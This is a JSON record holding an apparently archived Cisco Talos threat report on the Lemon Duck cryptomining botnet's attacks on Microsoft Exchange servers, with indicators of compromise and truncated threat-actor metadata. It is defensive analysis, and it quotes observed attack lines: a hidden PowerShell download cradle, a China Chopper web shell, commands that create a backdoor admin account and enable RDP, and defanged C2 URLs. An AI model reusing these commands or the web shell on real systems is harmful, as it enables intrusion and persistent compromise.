{ "id": "f48d7e10-d57e-4891-b306-1006299532ce", "created_at": "2026-04-06T00:22:29.983116Z", "updated_at": "2026-04-10T13:11:58.902947Z", "deleted_at": null, "sha1_hash": "e6ba34bbe78d34c34d977f69154df54c16da9590", "title": "Lemon Duck spreads its wings: Actors target Microsoft Exchange servers, incorporate new TTPs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 779027, "plain_text": "Lemon Duck spreads its wings: Actors target Microsoft Exchange\r\nservers, incorporate new TTPs\r\nBy Caitlin Huey\r\nPublished: 2021-05-07 · Archived: 2026-04-05 17:56:46 UTC\r\nFriday, May 7, 2021 15:50\r\nBy Caitlin Huey and Andrew Windsor with contributions from Edmund Brumaghin.\r\nLemon Duck continues to refine and improve upon their tactics, techniques and procedures as they attempt\r\nto maximize the effectiveness of their campaigns.\r\nLemon Duck remains relevant as the operators begin to target Microsoft Exchange servers, exploiting high-profile security vulnerabilities to drop web shells and carry out malicious activities.\r\nLemon Duck continues to incorporate new tools, such as Cobalt Strike, into their malware toolkit.\r\nAdditional obfuscation techniques are now being used to make the infrastructure associated with these\r\ncampaigns more difficult to identify and analyze.\r\nThe use of fake domains on East Asian top-level domains (TLDs) masks connections to the actual\r\ncommand and control (C2) infrastructure used in these campaigns.\r\nExecutive summary\r\nSince April 2021, Cisco Talos has observed updated infrastructure and new components associated with the\r\nLemon Duck cryptocurrency mining botnet that target unpatched Microsoft Exchange Servers and attempt to\r\ndownload and execute payloads for Cobalt Strike DNS beacons. This activity reflects updated tactics, techniques,\r\nand procedures (TTPs) associated with this threat actor. After several zero-day Microsoft Exchange Server\r\nvulnerabilities were made public on March 2, Cisco Talos and several other security researchers began observing\r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 1 of 15\n\nvarious threat actors, including Lemon Duck, leveraging these vulnerabilities for initial exploitation before\r\nsecurity patches were made available. Microsoft released a report on March 25 highlighting Lemon Duck's\r\ntargeting of Exchange Servers to install cryptocurrency-mining malware and a malware loader that was used to\r\ndeliver secondary malware payloads, such as information stealers. We also discovered that Lemon Duck actors\r\nhave been generating fake domains on East Asian top-level domains (TLDs) to mask connections to their\r\nlegitimate C2 domain since at least February 2020, highlighting another attempt to make their operations more\r\neffective. Below, we'll outline changes to the TTPs used by Lemon Duck across recent campaigns as they relate to\r\nvarious stages of these attacks.\r\nRecent campaigns and victimology\r\nCisco Talos researchers initially identified a notable increase in the volume of DNS queries being made for four\r\nnewly observed Lemon Duck domains:\r\nt[.]hwqloan[.]com\r\nd[.]hwqloan[.]com\r\nt[.]ouler[.]cc\r\nps2[.]jusanrihua[.]com  This spike, which occured on April 9, 2021, coincided with infection activity\r\ncollected within our telemetry systems associated with these same domains. We observed the largest spike\r\nin queries for ps2[.]jusanrihua[.]com, which peaked on April 13, then decreased before spiking again on\r\nApril 26.\r\nSpike in DNS queries to ps2[.]jusanrihua[.]com on April 9.\r\nLooking more closely at the geographic distribution of the domain resolution requests related to this activity, we\r\nobserved that the majority of them originated from North America, followed by Europe, South East Asia, with a\r\nfew others from South America and Africa. This is in contrast to the query distribution observed in October 2020,\r\nas described in our previous publication where the majority of the queries originated from Asia.\r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 2 of 15\n\nGeographic distribution of queries for t[.]hwqloan[.]com as seen by Cisco Umbrella.\r\nNotably, for one of these domains, d[.]hwqloan[.]com, over sixty percent of the DNS queries originated from\r\nIndia. We determined this activity was associated with infected systems attempting to communicate with Lemon\r\nDuck infrastructure. Since the communication with these domains typically occurs during the Lemon Duck\r\ninfection process, this activity may be indicative of the geographic distribution of the victims of these campaigns.\r\nIn Talos' original coverage of Lemon Duck, we described multiple overlaps between Lemon Duck and another\r\ncryptocurrency-mining malware, Beapy (aka Pcastle), which had previously been observed targeting East Asia. At\r\nthe time, Lemon Duck infections reported by other security researchers were beingobserved in much higher\r\nconcentrations in China. While Lemon Duck's currently observed victimology and methods of propagation are\r\nlargely indiscriminate, the seemingly exclusive use of country code TLDs (ccTLDs) for China, Japan and South\r\nKorea in the fake domains written to the Windows hosts file is notable, as described in the section \"Command and\r\ncontrol (C2)\" below.\r\nConsidering these ccTLDs are most commonly used for websites in their respective countries and languages, it is\r\nalso interesting that they were used, rather than more generic and globally used TLDs such as \".com\" or \".net.\"\r\nThis may allow the threat actor to more effectively hide C2 communications among other web traffic present in\r\nvictim environments. Due to the prevalence of domains using these ccTLDs, web traffic to the domains using the\r\nccTLDs may be more easily attributed as noise to victims within these countries. This may add another potential\r\noverlap with Beapy, as each have exhibited TTPs suggesting possible targeting of victims in East Asia. However,\r\nwithout additional evidence this particular connection remains low confidence, although it is interesting within the\r\ncontext of the other overlaps between the two families.\r\nNotable changes to Lemon Duck TTPs\r\nTalos has observed several recent changes to the tactics, techniques and procedures used by Lemon Duck. This\r\ndemonstrates that this threat actor is continuously evolving their approach to maximize their ability to achieve\r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 3 of 15\n\ntheir mission objectives. During our analysis of recent Lemon Duck campaigns, we observed that the threat actor\r\nis now leveraging new infrastructure, incorporating additional tools and functionality into their attack\r\nmethodology and workflow, and putting more emphasis on obfuscating various components used throughout the\r\ninfection process in an attempt to more effectively evade detection and analysis. Additionally, the threat actor is\r\ntargeting high-profile software vulnerabilities that may allow them to more effectively establish an initial foothold\r\nwithin victim environments. The following sections will describe these changes throughout each phase of the\r\nattack lifecycle in more detail.\r\nDelivery and initial exploitation\r\nLemon Duck features self-propagating capabilities and a modular framework that allow it to spread across\r\nnetwork connections to infect additional systems that become part of the Lemon Duck botnet and generate\r\nrevenue for threat actors by mining cryptocurrency. This automated exploitation of software vulnerabilities is one\r\nmechanism used by Lemon Duck to establish initial access and propagate across a network environment. Lemon\r\nDuck operators have previously employed several exploits for vulnerabilities, such as SMBGhost and Eternal\r\nBlue, and appear to be implementing new exploit code and targeting additional software vulnerabilities over time\r\nto ensure that they can continue to spread malware to new hosts and maintain the size of the botnet and revenue\r\nstream being generated by compromised hosts.\r\nLemon Duck targets Microsoft Exchange  \r\nTalos assesses with medium confidence these are likely newer Lemon Duck components associated with the\r\ntargeting of Microsoft Exchange Server vulnerabilities. The vulnerabilities being targeted, which Microsoft has\r\nsince issued patches for, are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. These\r\nvulnerabilities were reported on March 2, 2021 and affect Microsoft Exchange Server versions 2013, 2016 and\r\n2019. They have been leveraged by multiple threat actors targeting Microsoft Exchange servers around the world.\r\nWhile we could not determine the exact exploitation vector used in this campaign, the actors appear to be\r\ntargeting unpatched Exchange Servers, dropping web shells and employing several techniques that are consistent\r\nwith previous reporting on post-compromise activity leveraging these vulnerabilities, as discussed in the section\r\n\"Post-Compromise Activities on Exchange Servers\" below.\r\nTypical post-compromise activities\r\nOnce a new system has been compromised by Lemon Duck, the subsequent infection process features several\r\nnotable characteristics. In many cases, compromised systems attempt to retrieve additional components and\r\nmodules from attacker-controlled web servers. We observed typical Lemon Duck download attempts in telemetry\r\ndata for files such as \"ipc.jsp\" and \"aa.jsp\" on endpoints. This activity was associated with previously reported\r\nLemon Duck domains, such as t[.]netcatkit[.]com and t[.]bb3u9[.]com.\r\nThese files contain PowerShell instructions that are executed by the system and are responsible for reporting\r\nsuccessful infections and collecting system information from the victim machine, such as computer name, GUID\r\nand MAC address, which is then transmitted back to the attacker.\r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 4 of 15\n\nc:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe \u0026 powershell -w hidden IEX(New-Object Net.WebClient)\r\nAfter the initial beaconing and system information gathering, a base64-encoded Portable Executable (PE) file\r\n(6be5847c5b80be8858e1ff0ece401851886428b1f22444212250133d49b5ee30) was retrieved from the following\r\nURL:\r\nhxxp[:]//t[.]hwqloan[.]com/t.txt\r\nOnce decoded, the PE executed multiple commands using the Windows Management Instrumentation (WMI)\r\ncommand \"wmic.exe\" to uninstall AV/security products, such as ESET and Kaspersky. It also stopped and\r\nremoved various security-related services, such as the Windows Update feature, wuauserv, and Windows\r\nDefender. Some examples of this removal activity can be seen in the screenshot below.\r\nWMIC removing AV products.\r\nWhile analyzing the PE, we observed the execution of a PowerShell script that downloaded and executed an\r\nadditional malware payload, \"syspstem.dat\", from hxxp[:]//d[.]hwqloan[.]com, a newly observed subdomain for\r\nhwqloan[.]com. This payload was a Python executable file and likely related to the Python-based module\r\ndescribed in our previous publication. It includes the \"killer\" module which contains a hardcoded list of service\r\nnames that Lemon Duck uses to disable competing cryptocurrency miners. Once downloaded, it is saved to the\r\nAppData\\Local\\Temp\\ directory, where a subsequent PowerShell script checks to determine if the MD5 hash value\r\nof the file matches a hard-coded value. Assuming the check passes, it then creates a scheduled task called\r\n\"syspstem\" and configures it to execute it every 50 minutes, as seen below.\r\n\"syspstem\" scheduled task creation.\r\nThe PE file then makes an HTTP GET request to download a remote resource from\r\nhxxp[:]//ps2[.]jusanrihua[.]com/ps, which, at the time of analysis, appeared to be down and/or unavailable\r\nresulting in download failure.\r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 5 of 15\n\nConsistent with previous Lemon Duck campaigns, we observed the use of native Windows command-line utilities\r\nand living-off-the-land binaries or \"LoLBins\" to carry out various tasks throughout the infection process. Several\r\nscheduled tasks were also created for various purposes including achieving persistence across system reboots.\r\nIn more recent campaigns, we have observed several notable changes to the infection process. The threat actor is\r\nnow leveraging CertUtil to download and execute two new malicious PowerShell scripts, \"dns\" and \"shell.txt\"\r\nwhich are retrieved from an attacker-controlled web server (hxxp[:]//t[.]hwqloan[.]com), and saved as \"dn.ps1\"\r\nand \"c.ps1,\" respectively.\r\nThe PowerShell script \"dn.ps1\" attempts to uninstall multiple AV products, similar to what was previously\r\ndescribed and configures a scheduled task that will execute a subsequent PowerShell script. It also establishes\r\npersistence routines that attempt to download and execute content retrieved from each of the following URLs:\r\nhxxp[:]//t[.]hwqloan[.]com/dns\r\nhxxp[:]//t[.]ouler[.]cc/dns\r\nhxxp[:]//ps2[.]jusanrihua[.]com/dns Most notably, the URL hxxp[:]//ps2[.]jusanrihua[.]com/dns is used to\r\nretrieve a Cobalt Strike payload. This is a new evolution in Lemon Duck's toolset. For details related to the\r\nCobalt Strike payload and how it is being leveraged in Lemon Duck campaigns, refer to the section\r\n\"Command and Control (C2).\"\r\nThe PowerShell script \"c.ps1\" contains several CertUtil commands that are used to download additional payloads,\r\nsuch as a variant of the XMRig cryptocurrency miner \"m6.exe,\" which Lemon Duck's used in the past. This\r\nactivity is also consistent with activity that was previously reported here.\r\nBased on analysis of system activities associated with these campaigns, additional post-compromise discovery and\r\ntargeting activities may be conducted as described in the section \"Exchange Server Reconnaissance and\r\nDiscovery.\" Following execution of the cryptocurrency mining payload, the PowerShell script is responsible for\r\ncleaning up various artifacts and removing indicators of compromise, such as the aforementioned \"dn.ps1\" and\r\n\"c.ps1\" from the infected system.\r\nThe \"netsh.exe\" Windows command is also used to disable Windows Firewall settings, enable port forwarding,\r\nand redirect traffic to 1[.]1[.]1[.]1[:]53 from port 65529/TCP. As described in previous Lemon Duck reporting, the\r\nmalware uses port 65529 as an indicator to identify if systems have already been compromised, and thus avoid\r\nreusing the exploitation modules on them if it is not necessary.\r\nPost-compromise activities targeting Exchange servers\r\nWhile analyzing telemetry related to ongoing Lemon Duck campaigns, we identified malicious activity being\r\nconducted on endpoints whose host names indicated they may be mail servers running Microsoft Exchange. This\r\nelevated our level of confidence that they may have been compromised by exploitation attempts targeting the\r\npreviously described Microsoft Exchange vulnerabilities, with variants of known web shells being uploaded\r\nfollowing successful system compromise. The following section describes malicious activity that was detected on\r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 6 of 15\n\nthese systems that may indicate that the adversaries are now showing specific interest in compromising Microsoft\r\nExchange servers and leveraging them for nefarious purposes.\r\nExchange Server directory creation\r\nWhile analyzing the malicious activity detected on compromised systems suspected to be Exchange servers, we\r\nidentified the execution of interesting system commands using the Windows Control Manager (sc.exe). This\r\nnative Windows executable was used to set descriptions for services, configure services, and start services on\r\ncompromised systems. An example of this can be seen below:\r\n\"sc.exe\" used to configure, start services on compromised systems.\r\nInterestingly, the DisplayName used in this case contained the value \"Microsofts\" and appeared to be a reference\r\nto the \"Windows Defender Antivirus Network Inspection Service,\" which according to this description of the\r\nservice (WdNisSvc), \"helps guard against intrusion attempts targeting known and newly discovered vulnerabilities\r\nin network protocols.\"\r\nWe also observed the creation of various directories within the IIS web directory on infected systems. An example\r\nof this can be seen below.\r\nmd C:\\inetpub\\wwwroot\\aspnet_client\\js\\demo\r\nThe creation and use of this directory structure is consistent with previous reporting on various TTPs related to\r\nsuccessful attacks against Exchange servers leveraging the vulnerabilities described earlier in the section \"Lemon\r\nDuck targets Microsoft Exchange.\"\r\nThe adversary also copied several files into it, including two .ASPX files named \"wanlins.aspx\" and\r\n\"wanlin.aspx.\" These files are likely web shells and were copied from C:\\inetpub\\wwwroot\\aspnet_client\\, a\r\nknown directory where a majority of the web shells were initially observed following Microsoft's release of details\r\nrelated to Hafnium activity. An example of this can be seen below.\r\ncopy C:\\inetpub\\wwwroot\\aspnet_client\\wanlin.aspx C:\\inetpub\\wwwroot\\aspnet_client\\js\\demo\\wanlins.aspx\r\nThis newly created directory appears to be the actor's working environment (\\js\\demo), and was likely used by the\r\nactor to stage files early in the post-compromise phase of the attack. In late March 2021, it was reported here that\r\na file with the name \"wanlin.aspx\" was observed as part of a large number of web shell probing requests that were\r\nbelieved to be part of scanning activity conducted by security vendors and research organizations. These same file\r\nnames were also identified by security researchers as being associated with various web shells that were identified\r\nnearly a month after Microsoft's initial publication related to threat actors' exploitation of these Exchange\r\nvulnerabilities by threat actors.\r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 7 of 15\n\nThe Windows \"attrib\" command was also used to set the Archive file attribute, System file attribute, Read-only\r\nattribute, and the Hidden file attribute on the previously created files and directories, likely as a way to obfuscate\r\nthe actor's activities on the system.\r\nModifying file attributes with the \"attrib\" command.\r\nNext, we observed the echo command being used to write code associated with a web shell into the previously\r\ncreated ASPX files. In this case, several characteristics matched portions of code associated with known China\r\nChopper variants identified days after the Exchange Server vulnerabilities were publicized. An example of this can\r\nbe seen below.\r\necho '\u003cscript language=\"JScript\" runat=\"server) function Page_Load(){/**/eval(Request[\"code\"],\"unsafe\");}\u003c/scri\r\nThe 'runat=server' attribute causes the script to be processed server-side instead of client-side, while JScript is\r\nspecified as the language used for the script block. Researchers have previously noted many variations in the\r\nChina Chopper web shells dropped in attacks exploiting the Exchange vulnerabilities before security patches were\r\nissued. This further highlights that we will likely continue to see a variety of TTPs associated with this activity as\r\nan increasing number of actors incorporate these CVEs into their attacks.\r\nAnother Lemon Duck sample within our telemetry data was detected during the same timeframe and also\r\nattempted to create an additional Exchange-specific directory structure on infected systems. This new directory\r\nwas located at the following filesystem path:\r\nE:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\js\\demo\r\nWhile we did not observe .ASPX files copied into this directory location on the system where this activity was\r\ndetected, this clearly demonstrates specific interest in operating on and the targeting of Microsoft Exchange\r\nservers by the threat actor.\r\nExchange Server reconnaissance and discovery\r\nWe also observed post-compromise activities consistent with previous reporting on additional reconnaissance and\r\ndiscovery conducted following successful exploitation of the Microsoft Exchange vulnerabilities described earlier\r\nin this post.\r\nThe built in \"net\" and \"net1\" command-line utilities were used to create new user accounts with local\r\nadministrator privileges on systems and modify local group membership. We observed the command \"net user\"\r\nbeing used to create a new user with the alias \"netcat\" and a designated password, followed by several attempts to\r\ninvoke \"net localgroup\" to add this newly created user to the following local security groups: administrators,\r\nAdministrateurs, Remote Desktop Users and Enterprise Admins.\r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 8 of 15\n\n\"net\" commands are used to add users and modify local groups.\r\nWe also observed \"net1\" commands with the following syntax:\r\nC:\\Windows\\system32\\net1 user netcat qweqwe$123 /add\r\nCreating a new user and adding it to local groups may be an attempt to obfuscate and/or minimize evidence of\r\nsuspicious activities. One of these groups, Administrateurs may suggest that a language preference was used to\r\nmore broadly target additional systems in order to query and add groups on those systems.\r\nWMI commands were also leveraged to modify the registry and enable Remote Desktop Protocol (RDP) using the\r\nfollowing syntax:\r\nREG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000\r\nThis registry modification is consistent with post-exploitation activities previously reported by Microsoft in their\r\nreport related to successful exploitation campaigns against Exchange Servers leveraging the same Exchange\r\nvulnerabilities. At this point, a typical Lemon Deck infection chain follows, similar to what was described earlier\r\nin the section \"Typical Post-Compromise Activities.\"\r\nRecent Lemon Duck activity suggests that the operators are continuing to update portions of their attack to remain\r\nviable as they incorporate new TTPs and begin targeting new high-profile security vulnerabilities. Some examples\r\nof suspicious activities we observed throughout recent Lemon Duck campaigns include the following:\r\nCreation of various Exchange-specific directory structures within the IIS web directory on compromised\r\nsystems.\r\nCopying of .ASPX files associated with these web shells into the recently created Exchange-specific\r\ndirectory structure.\r\nPost-compromise activity including the creation of new users and modification of local group membership\r\nusing the \"net\" and \"net1\" commands.\r\nModification of the Windows registry to enable RDP access to the system. As the number of distinct threat\r\ngroups incorporate these exploits into their attacks continues to increase, we're likely to see varying\r\ntechniques associated with this activity. We recommend checking for the aforementioned activity as\r\npotential evidence of compromise.\r\nCommand and control (C2)  \r\nCobalt Strike DNS beacons  \r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 9 of 15\n\nLemon Duck was also observed leveraging Cobalt Strike payloads during recent campaigns, representing an\r\nevolution in the toolset used by this threat actor and demonstrating that they continue to refine their approach to\r\nthe attack lifecycle over time as they identify opportunities to increase their efficiency as well as the effectiveness\r\nof their attacks. While analyzing Lemon Duck infection activity, we observed PowerShell being used to download\r\nand execute a Cobalt Strike payload that was retrieved from the following URL:\r\nhxxp[:]//ps2[.]jusanrihua[.]com/dns\r\nThis payload was configured as a Windows DNS beacon and attempts to communicate with the C2 server\r\n(1f0834b2[.]ps2[.]jusanrihua[.]com) using a DNS-based covert channel. The beacon then communicates with this\r\nspecific subdomain to transmit encoded data via DNS A record query requests. An example of this activity can be\r\nseen in the screenshot below.\r\nWireshark showing DNS requests to 1f0834b2[.]ps2[.]jusanrihua[.]com.\r\nThis represents a new TTP for Lemon Duck, and is another example of their reliance on offensive security tools\r\n(OSTs), including Powersploit's reflective loader and a modified Mimikatz, which are already included as\r\nadditional modules and components of Lemon Duck and used throughout the typical attack lifecycle.\r\nDecoy domain generation\r\nAnother previously unreported TTP we have observed is Lemon Duck's use of a new technique to obfuscate their\r\nC2 domain(s). This technique appears to have been used by Lemon Duck since at least February 2020, according\r\nto our telemetry data. During the Lemon Duck infection process, PowerShell is used to invoke the\r\n\"GetHostAddresses\" method from the .NET runtime class \"Net.Dns\" to obtain the current IP address for an\r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 10 of 15\n\nattacker-controlled domain. For example, during our analysis, we observed the following domains being used for\r\nthis purpose.\r\nt[.]awcna[.]com\r\nt[.]tr2q[.]com\r\nt[.]amxny[.]com This IP address is combined with a fake hostname hardcoded into the PowerShell\r\ncommand and written as an entry to the Windows hosts file located at\r\nc:\\windows\\system32\\drivers\\etc\\hosts.\r\nThis mechanism allows name resolution to continue even if DNS-based security controls are later deployed as the\r\ntranslation is now recorded locally and future resolution requests no longer rely upon upstream infrastructure such\r\nas DNS servers. This may allow the adversary to achieve longer term persistence once operational in victim\r\nenvironments. The domain information written to the hosts file varied across each Lemon Duck infection we\r\nanalyzed.\r\nThese values are stored as string literals within the intermediate PowerShell invocation. Since the PowerShell\r\ncode itself does not generate these string values, they are likely generated within the initial Lemon Duck PE as the\r\nPowerShell script itself is constructed or may be included statically within the files used for intermediate stage\r\nexecution hosted on the C2 servers. The decoy domain composition does not appear to be derived from dictionary\r\nwords or combinations. Character case varies significantly, as does the use of numerals interspersed with ASCII\r\nlatin characters. There are also slight variations in length, although the generated domains in the samples we\r\nanalyzed do not have a length greater than ten alphanumeric characters, not including the top level domain (TLD).\r\nAll of the TLDs used are East Asian country code TLDs including .cn, .kr and .jp. While this activity dates back\r\nalmost a year, this particular technique has likely supported Lemon Duck's continued persistence throughout its\r\nlengthy campaign.\r\nOther cryptocurrency-mining botnets targeting Exchange vulnerabilities\r\nTalos began to observe domains linked to Lemon Duck and another cryptocurrency miner, DLTMiner, as\r\ninfrastructure used in post-exploitation activity that targeted the Microsoft Exchange zero-days in early March\r\n2021. Other security firms have also detailed the actions of DLTMiner. We also identified activity that was\r\npublished very recently related to some of the components mentioned above (c.ps1, dns.ps1, m6.exe) that were\r\nobserved on compromised systems where ransomware was also deployed. At this time, there doesn't appear to be a\r\nlink between the Lemon Duck components observed there and the reported ransomware (TeslaRVNG2). This\r\nsuggests that given the nature of the vulnerabilities targeted, we are likely to continue to observe a range of\r\nmalicious activities in parallel, using similar exploitation techniques and infection vectors to compromise systems.\r\nIn some cases, attackers may take advantage of artifacts left in place from prior compromises, making distinction\r\nmore difficult.\r\nOpen-source research indicates that additional cryptocurrency mining malware variants have been leveraging\r\nvulnerable Exchange Servers as an initial exploitation vector for their operations. For example, in late April 2021,\r\nanother cryptocurrency mining botnet, Prometei, was reported to be exploiting two of the aforementioned\r\nExchange Server vulnerabilities (CVE-2021-27065 and CVE-2021-26858) which allowed the attackers to achieve\r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 11 of 15\n\nremote code execution on the host. The attackers then installed and executed a variant of the China Chopper web\r\nshell, among other custom and native Windows utilities. Due to the increasing number of actors incorporating\r\nthese CVEs into their attacks, we will likely continue to see a variety of TTPs associated with this activity going\r\nforward.\r\nConclusion\r\nLemon Duck continues to launch campaigns against systems around the world, attempting to leverage infected\r\nsystems to mine cryptocurrency and generate revenue for the adversary behind this botnet. The use of new tools\r\nlike Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack\r\nlifecycle, may enable them to operate more effectively for longer periods within victim environments. New TTPs\r\nconsistent with those reportedly related to widespread exploitation of high-profile Microsoft Exchange software\r\nvulnerabilities, and additional host-based evidence suggest that this threat actor is also now showing a specific\r\ninterest in targeting Exchange Servers as they attempt to compromise additional systems and maintain and/or\r\nincrease the number of systems within the Lemon Duck botnet. Organizations should remain vigilant against this\r\nthreat, as it will likely continue to evolve.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint is ideally suited to prevent the execution of the malware detailed in this post. New users\r\ncan try Cisco Secure Endpoint for free here.\r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 12 of 15\n\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Firewall and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Malware Analytics helps identify malicious binaries and build protection into all Cisco Security\r\nproducts.\r\nCisco Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and\r\nURLs, whether users are on or off the corporate network.\r\nAdditional protections with context to your specific environment and threat data are available from the Cisco\r\nSecure Firewall Management Center.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.The following SIDs have been released to detect this threat: 45549:4, 46237,\r\n50795, 55926, 57469 - 57474.\r\nThe following ClamAV signatures have been released to detect this threat as well as tools and malware related to\r\nthese campaigns:\r\nPs1.Trojan.Lemonduck-9856143\r\nPs1.Trojan.Lemonduck-9856144\r\nWin.Trojan.CobaltStrike-7917400\r\nWin.Trojan.CobaltStrike-8091534 The following Cisco Secure Endpoint Cloud IOCs have been released to\r\ndetect this threat on endpoints:\r\nW32.LemonDuckCryptoMiner.ioc\r\nClam.Ps1.Dropper.LemonDuck-9775016-1\r\nWin.Miner.LemonDuck.tii.Talos\r\nPs1.Dropper.LemonDuck\r\nClam.Js.Malware.LemonDuck-9775029-1\r\nATT\u0026CK Technique Mapping\r\nThe following ATT\u0026CK techniques have been observed across the Lemon Duck campaigns described in this blog\r\npost.\r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 13 of 15\n\nIndicators of Compromise (IOCs)\r\nThe following indicators of compromise have been observed as being associated with these malware campaigns.\r\nHashes The following file hashes (SHA256) have been observed as being associated with these\r\nmalware campaigns.\r\n67d3986c97a8b8842c76130db300ff9cd49e6956c696f860413b7b4cf0f069ec smgh.jsp\r\nf3c25eefacda4e37d36fa61cdbd5b3ba0fcb89351db829c4d859f9bcb83551cd t.txt\r\nd811b21ac8ab643c1a1a213e52c548e6cb0bea51ca426b75a1f5739faff16cbd m6.exe\r\n4a49002c12281c2e45bcfc330f006611ce34791eda62cf4022a117ae29a57908 sysps.dat\r\n3e2f5f43ee0b5afbea8a65ae943c5d40ac66e7af43067312b29b7d05e8ea31f2 shell.txt\r\n0e116b0c88a727c5bfa761125ba08dfd772f0fac13ab16d7ac1a614ff7ec72ca shell.txt\r\nb3f8e579315a8639ae5389e81699f11c7a7797161568e609eb387fbfb623a519 dns\r\nedb4af3ad9083bbdd67f6fa742b1959da2bda28baadacfb7705216a9af5b61b0 dns\r\n9f2fb97fea297f146a714d579666a1b9efd611edd8c1484629e0a458481307e5 svchost.dat\r\nafc70220e3100e142477a2c4ea54f298a7a6474febc51ba581fc1e5c2da2f3f6 cc.ps1\r\nc3c786616d69c1268b6bb328e665ce1a5ecb79f6d2add819b14986f6d94031a1 mail.jsp\r\n6be5847c5b80be8858e1ff0ece401851886428b1f22444212250133d49b5ee30\r\n069547eebb24585455d6eece493eb46a8e045029cb97ace0a662394aebdbf7b7 m6g.bin.exe\r\n941da851c01806fa983e972cb6f603399fbd6608df9280a753f3d2ed0fedafb5 report.ps1\r\n7c3ba189cf35ec007237a28e9d0c3ddf5765d4f85cf0e27439ba36cc721e4cf8 kr.bin\r\ne8010a6942b70918ff01219128a005e13bcbc41b62e88261803cedf086738266 if.bin\r\nURLs The following URLs have been observed as being associated with these malware\r\ncampaigns.\r\nhxxp[:]//t[.]hwqloan[.]com/dns\r\nhxxp[:]//t[.]hwqloan[.]com/m6.exe\r\nhxxp[:]//t[.]hwqloan[.]com/svchost.dat\r\nhxxp[:]//t[.]hwqloan[.]com/shell.txt\r\nhxxp[:]//d[.]hwqloan[.]com/t.txt\r\nhxxp[:]//d[.]hwqloan[.]com/syspstem.dat\r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 14 of 15\n\nhxxp[:]//t[.]ouler[.]cc/dns\r\nhxxp[:]//ps2[.]jusanrihua[.]com/dns\r\nhxxp[:]//ps2[.]jusanrihua[.]com:80/ps\r\nDomains: The following domains have been observed in the activity discussed above.\r\naeon-pool.sqlnetcat[.]com\r\napis.890[.]la\r\nwakuang.eatuo[.]com\r\nThe following domains have been observed as being generated using the Domain Generation Algorithm (DGA)\r\ndescribed in this blog post.\r\ndqIUHfNYL[.]kr\r\nvTr1RG2d9jQ[.]jp\r\nf56Ov2bn[.]cn\r\nzd0OVCFb[.]jp\r\neEy8QwB[.]jp\r\neiv0VGAD[.]cn\r\nXnxA8pv[.]jp\r\naV4Rq7lNZ[.]kr\r\nEMYDH4vzVK[.]cn\r\nQlhcXbC[.]kr\r\nRuesiAlJTCg[.]kr\r\nMua1s5tV[.]kr\r\nCUQmXrN2Ac[.]jp\r\nd2btrgUkxO[.]jp\r\ngktTpF[.]cn\r\nikKGVEgplC[.]kr\r\n9o6XVWm[.]kr\r\ng9Ve5b6T4[.]cn\r\n7M03nX[.]jp\r\nSource: https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nhttps://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html" ], "report_names": [ "lemon-duck-spreads-wings.html" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7c969685-459b-4c93-a788-74108eab6f47", "created_at": "2023-01-06T13:46:39.189751Z", "updated_at": "2026-04-10T02:00:03.241102Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "Red Dev 13", "Silk Typhoon", "MURKY PANDA", "ATK233", "G0125", "Operation Exchange Marauder" ], "source_name": "MISPGALAXY:HAFNIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2704d770-43b4-4bc4-8a5a-05df87416848", "created_at": "2022-10-25T15:50:23.306305Z", "updated_at": "2026-04-10T02:00:05.296581Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "HAFNIUM", "Operation Exchange Marauder", "Silk Typhoon" ], "source_name": "MITRE:HAFNIUM", "tools": [ "Tarrask", "ASPXSpy", "Impacket", "PsExec", "China Chopper" ], "source_id": "MITRE", "reports": null }, { "id": 